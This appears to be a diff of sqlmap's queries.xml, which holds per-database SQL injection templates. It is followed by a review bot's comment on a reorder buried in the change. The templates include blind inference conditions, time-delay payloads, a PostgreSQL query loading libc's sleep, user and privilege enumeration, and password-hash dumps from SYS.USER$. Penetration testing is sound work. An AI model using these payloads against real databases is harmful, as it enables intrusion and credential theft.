<inband query="SELECT GRANTEE, PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME, PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
|
||||||
<blind query="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
|
|
||||||
</privileges>
|
|
||||||
<!--
|
|
||||||
NOTE: in Oracle to enumerate the roles for the session user you can use:
|
|
||||||
SELECT * FROM SESSION_ROLES
|
|
||||||
-->
|
|
||||||
<roles>
|
|
||||||
<inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME, GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
|
||||||
<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
|
|
||||||
</roles>
|
|
||||||
<!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
|
|
||||||
<dbs/>
|
|
||||||
<tables>
|
|
||||||
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
|
||||||
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
|
|
||||||
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
|
|
||||||
</tables>
|
|
||||||
<columns>
|
|
||||||
<inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
|
||||||
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
|
||||||
</columns>
|
|
||||||
<dump_table>
|
|
||||||
<inband query="SELECT %s FROM %s"/>
|
|
||||||
<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
|
||||||
</dump_table>
|
|
||||||
<search_db/>
|
|
||||||
<search_table>
|
|
||||||
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
|
||||||
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES WHERE " condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
|
||||||
<blind query="SELECT DISTINCT(TABLESPACE_NAME) FROM SYS.ALL_TABLES WHERE " query2="SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" count="SELECT COUNT(DISTINCT(TABLESPACE_NAME)) FROM SYS.ALL_TABLES WHERE " count2="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
|
||||||
</search_table>
|
|
||||||
<search_column>
|
|
||||||
<inband query="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE " condition="COLUMN_NAME"/>
|
|
||||||
<blind query="" query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS" count="" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS" condition="COLUMN_NAME"/>
|
|
||||||
</search_column>
|
|
||||||
</dbms>
|
|
||||||
|
|
||||||
<!-- PostgreSQL -->
|
<!-- PostgreSQL -->
|
||||||
<dbms value="PostgreSQL">
|
<dbms value="PostgreSQL">
|
||||||
<cast query="CAST(%s AS CHARACTER(10000))"/>
|
<cast query="CAST(%s AS CHARACTER(10000))"/>
|
||||||
|
@ -175,7 +96,6 @@
|
||||||
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
|
<timedelay query="SELECT PG_SLEEP(%d)" query2="SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 300000%d))" query3="CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep(%d)"/>
|
||||||
<substring query="SUBSTR((%s)::text, %d, %d)"/>
|
<substring query="SUBSTR((%s)::text, %d, %d)"/>
|
||||||
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
|
||||||
<error query="%s %s=CAST(%s||(%s)::text||%s AS NUMERIC)"/>
|
|
||||||
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
|
<inference query="AND ASCII(SUBSTR((%s)::text, %d, 1)) > %d"/>
|
||||||
<banner query="SELECT VERSION()"/>
|
<banner query="SELECT VERSION()"/>
|
||||||
<current_user query="SELECT CURRENT_USER"/>
|
<current_user query="SELECT CURRENT_USER"/>
|
||||||
|
@ -242,7 +162,6 @@
|
||||||
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
||||||
<substring query="SUBSTRING((%s), %d, %d)"/>
|
<substring query="SUBSTRING((%s), %d, %d)"/>
|
||||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||||
<error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
|
|
||||||
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
||||||
<banner query="SELECT @@VERSION"/>
|
<banner query="SELECT @@VERSION"/>
|
||||||
<current_user query="SELECT SYSTEM_USER"/>
|
<current_user query="SELECT SYSTEM_USER"/>
|
||||||
|
@ -290,6 +209,83 @@
|
||||||
</search_column>
|
</search_column>
|
||||||
</dbms>
|
</dbms>
|
||||||
|
|
||||||
|
<!-- Oracle -->
|
||||||
|
<dbms value="Oracle">
|
||||||
|
<cast query="CAST(%s AS VARCHAR(4000))"/>
|
||||||
|
<length query="LENGTH(%s)"/>
|
||||||
|
<isnull query="NVL(%s, ' ')"/>
|
||||||
|
<delimiter query="||"/>
|
||||||
|
<limit query="ROWNUM AS LIMIT %s) WHERE LIMIT"/>
|
||||||
|
<limitregexp query="ROWNUM\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+|ROWNUM\s*=\s*[\d]+"/>
|
||||||
|
<limitgroupstart/>
|
||||||
|
<limitgroupstop/>
|
||||||
|
<limitstring/>
|
||||||
|
<order query="ORDER BY %s ASC"/>
|
||||||
|
<count query="COUNT(%s)"/>
|
||||||
|
<comment query="--"/>
|
||||||
|
<timedelay query="BEGIN DBMS_LOCK.SLEEP(%d); END" query2="EXEC DBMS_LOCK.SLEEP(%d.00)" query3="EXEC USER_LOCK.SLEEP(%d.00)"/>
|
||||||
|
<substring query="SUBSTR((%s), %d, %d)"/>
|
||||||
|
<case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) FROM DUAL"/>
|
||||||
|
<inference query="AND ASCII(SUBSTR((%s), %d, 1)) > %d"/>
|
||||||
|
<banner query="SELECT banner FROM v$version WHERE ROWNUM=1"/>
|
||||||
|
<current_user query="SELECT USER FROM DUAL"/>
|
||||||
|
<current_db query="SELECT SYS.DATABASE_NAME FROM DUAL"/>
|
||||||
|
<!--
|
||||||
|
NOTE: in Oracle to check if the session user is DBA you can use:
|
||||||
|
SELECT USERENV('ISDBA') FROM DUAL
|
||||||
|
-->
|
||||||
|
<is_dba query="(SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE GRANTEE=USER AND GRANTED_ROLE='DBA')='DBA'"/>
|
||||||
|
<users>
|
||||||
|
<inband query="SELECT USERNAME FROM SYS.ALL_USERS ORDER BY 1"/>
|
||||||
|
<blind query="SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS"/>
|
||||||
|
</users>
|
||||||
|
<passwords>
|
||||||
|
<inband query="SELECT NAME, PASSWORD FROM SYS.USER$" condition="NAME"/>
|
||||||
|
<blind query="SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$ WHERE NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$ WHERE NAME='%s'"/>
|
||||||
|
</passwords>
|
||||||
|
<!--
|
||||||
|
NOTE: in Oracle to enumerate the privileges for the session user you can use:
|
||||||
|
SELECT * FROM SESSION_PRIVS
|
||||||
|
-->
|
||||||
|
<privileges>
|
||||||
|
<inband query="SELECT GRANTEE, PRIVILEGE FROM DBA_SYS_PRIVS" query2="SELECT USERNAME, PRIVILEGE FROM USER_SYS_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||||
|
<blind query="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM DBA_SYS_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(PRIVILEGE) FROM (SELECT DISTINCT(PRIVILEGE), ROWNUM AS LIMIT FROM USER_SYS_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM DBA_SYS_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(PRIVILEGE)) FROM USER_SYS_PRIVS WHERE USERNAME='%s'"/>
|
||||||
|
</privileges>
|
||||||
|
<!--
|
||||||
|
NOTE: in Oracle to enumerate the roles for the session user you can use:
|
||||||
|
SELECT * FROM SESSION_ROLES
|
||||||
|
-->
|
||||||
|
<roles>
|
||||||
|
<inband query="SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS" query2="SELECT USERNAME, GRANTED_ROLE FROM USER_ROLE_PRIVS" condition="GRANTEE" condition2="USERNAME"/>
|
||||||
|
<blind query="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s') WHERE LIMIT=%d" query2="SELECT DISTINCT(GRANTED_ROLE) FROM (SELECT DISTINCT(GRANTED_ROLE), ROWNUM AS LIMIT FROM USER_ROLE_PRIVS WHERE USERNAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE='%s'" count2="SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM USER_ROLE_PRIVS WHERE USERNAME='%s'"/>
|
||||||
|
</roles>
|
||||||
|
<!-- NOTE: in Oracle there is no query to enumerate DBMS databases. It is possible only through a STATUS request to the Oracle TNS Listener negotiating its protocol -->
|
||||||
|
<dbs/>
|
||||||
|
<tables>
|
||||||
|
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
||||||
|
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES" condition="TABLESPACE_NAME"/>
|
||||||
|
<blind query="SELECT TABLE_NAME FROM (SELECT TABLE_NAME, ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s') WHERE LIMIT=%d" count="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'"/>
|
||||||
|
</tables>
|
||||||
|
<columns>
|
||||||
|
<inband query="SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
||||||
|
<blind query="SELECT COLUMN_NAME FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" query2="SELECT DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s'" condition="COLUMN_NAME"/>
|
||||||
|
</columns>
|
||||||
|
<dump_table>
|
||||||
|
<inband query="SELECT %s FROM %s"/>
|
||||||
|
<blind query="SELECT %s FROM (SELECT %s, ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||||
|
</dump_table>
|
||||||
|
<search_db/>
|
||||||
|
<search_table>
|
||||||
|
<!-- NOTE: in Oracle the TABLESPACE_NAME is the spacename corresponding to SYS, SYSDBA, USERS. It is NOT the database name -->
|
||||||
|
<inband query="SELECT TABLESPACE_NAME, TABLE_NAME FROM SYS.ALL_TABLES WHERE " condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
||||||
|
<blind query="SELECT DISTINCT(TABLESPACE_NAME) FROM SYS.ALL_TABLES WHERE " query2="SELECT TABLE_NAME FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" count="SELECT COUNT(DISTINCT(TABLESPACE_NAME)) FROM SYS.ALL_TABLES WHERE " count2="SELECT COUNT(TABLE_NAME) FROM SYS.ALL_TABLES WHERE TABLESPACE_NAME='%s'" condition="TABLE_NAME" condition2="TABLESPACE_NAME"/>
|
||||||
|
</search_table>
|
||||||
|
<search_column>
|
||||||
|
<inband query="SELECT TABLE_NAME FROM SYS.ALL_TAB_COLUMNS WHERE " condition="COLUMN_NAME"/>
|
||||||
|
<blind query="" query2="SELECT DISTINCT(TABLE_NAME) FROM SYS.ALL_TAB_COLUMNS" count="" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYS.ALL_TAB_COLUMNS" condition="COLUMN_NAME"/>
|
||||||
|
</search_column>
|
||||||
|
</dbms>
|
||||||
|
|
||||||
<!-- SQLite -->
|
<!-- SQLite -->
|
||||||
<dbms value="SQLite">
|
<dbms value="SQLite">
|
||||||
<!-- Not supported on SQLite 2 -->
|
<!-- Not supported on SQLite 2 -->
|
||||||
|
@ -477,7 +473,6 @@
|
||||||
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
<timedelay query="WAITFOR DELAY '0:0:%d'"/>
|
||||||
<substring query="SUBSTRING((%s), %d, %d)"/>
|
<substring query="SUBSTRING((%s), %d, %d)"/>
|
||||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||||
<error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
|
|
||||||
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
|
||||||
<banner query="SELECT @@VERSION"/>
|
<banner query="SELECT @@VERSION"/>
|
||||||
<current_user query="SELECT SUSER_NAME()"/>
|
<current_user query="SELECT SUSER_NAME()"/>
|
||||||
|
|
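Review bot: A functional one-line change, dropping Oracle's `<error>` element, is buried inside a ~155-line verbatim move of the whole Oracle `<dbms>` block (removed in the @@ -74,84 +73,6 @@ hunk, re-added after Microsoft SQL Server in the @@ -290,6 +209,83 @@ hunk), and the commit message only says "Moved <error> from queries.xml to payloads.xml" without mentioning the relocation. A reorder with no behavioural intent belongs in its own commit, or the description should state that the Oracle block was moved so a reviewer does not have to diff the two copies by hand to confirm nothing else changed. The same `<error>` removal also applies in the MySQL, PostgreSQL, Microsoft SQL Server and Sybase hunks of this file. Since every `<dbms>` here loses its `<error>` child, any consumer still reading that element from the parsed queries structure would now hit a missing entry; that consumer is not visible in this section, so it is worth confirming it was switched to the new `<epayload>` tags in the same commit.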